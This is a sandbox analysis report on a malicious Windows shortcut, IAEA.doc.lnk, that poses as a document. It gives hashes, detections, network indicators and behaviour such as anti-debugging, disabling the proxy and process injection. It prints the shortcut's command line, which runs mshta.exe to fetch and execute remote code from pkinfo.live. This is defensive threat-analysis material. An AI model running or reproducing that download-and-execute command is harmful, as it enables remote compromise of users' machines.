popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

IAEA.doc.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 5, 2024, 8:31 a.m. Sept. 5, 2024, 8:33 a.m.
Size 2.1KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Sat Dec 7 00:09:39 2019, mtime=Mon Apr 17 03:06:41 2023, atime=Sat Dec 7 00:09:39 2019, length=14848, window=hidenormalshowminimized
MD5 1d2b9a986461e97edfff9b91e64e1e5b
SHA256 c2bc69085df7036bdef980932a2383b34a9fb76a92d85b9f377beca060053c17
CRC32 70B278CF
ssdeep 24:8ALkQCvn//E8AZ68+xebf+/2gnTT4I0BXQaR3+POh6BOY+/vm:8Ckx/WI8+ebfUMIOXv3Fh6BOYk
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
pkinfo.live
A 103.231.75.189
103.231.75.189
IP Address Status Action
103.231.75.189 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73352000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\IAEA.doc.lnk
cmdline "C:\Windows\System32\mshta.exe" https://pkinfo.live/config.php
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002c0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Cynet Malicious (score: 99)
CAT-QuickHeal LNK.APT.43736
Skyhigh BehavesLike.Trojan.xx
VIPRE Heur.BZC.YAX.Nioc.1.0A2B0023
Arcabit Heur.BZC.YAX.Nioc.1.0A2B0023
BitDefender Heur.BZC.YAX.Nioc.1.0A2B0023
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0A2B0023
Emsisoft Heur.BZC.YAX.Nioc.1.0A2B0023 (B)
F-Secure Malware.LNK/Dldr.Agent.VPUJ
FireEye Heur.BZC.YAX.Nioc.1.0A2B0023
Sophos Troj/DownLnk-X
SentinelOne Static AI - Suspicious LNK
Google Detected
Avira LNK/Dldr.Agent.VPUJ
MAX malware (ai score=83)
GData Heur.BZC.YAX.Nioc.1.0A2B0023
Zoner Probably Heur.LNKScript
Fortinet LNK/Agent.AHY!tr.dldr
Process injection Process 2560 resumed a thread in remote process 2672
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2672
1 0 0
dead_host 103.231.75.189:443